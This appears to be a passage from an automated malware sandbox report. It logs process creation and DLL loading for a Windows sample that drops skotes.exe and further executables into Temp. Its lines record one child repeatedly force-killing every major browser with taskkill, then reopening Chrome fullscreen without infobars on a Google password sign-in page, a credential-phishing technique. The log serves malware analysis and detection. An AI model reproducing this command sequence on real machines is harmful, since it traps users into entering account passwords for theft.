                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe "C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1152,i,15500864807837732652,8979653825790183584,262144 /prefetch:8
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4516 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe "C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe "C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1000336001\num.exe "C:\Users\user\AppData\Local\Temp\1000336001\num.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe "C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /TJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /TJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /TJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /TJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /TJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobarsJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8Jump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5648 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8Jump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8Jump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5800 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8Jump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobarsJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4484 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8Jump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2904 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8Jump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4516 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8Jump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1152 --field-trial-handle=2040,i,8769351574913738686,7511269282204500585,262144 /prefetch:8
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1992,i,7048868189645442855,15603037541109083957,262144 /prefetch:8
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1152,i,15500864807837732652,8979653825790183584,262144 /prefetch:8
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: unknown unknown
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: mstask.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: dui70.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: duser.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: chartv.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: atlthunk.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: explorerframe.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
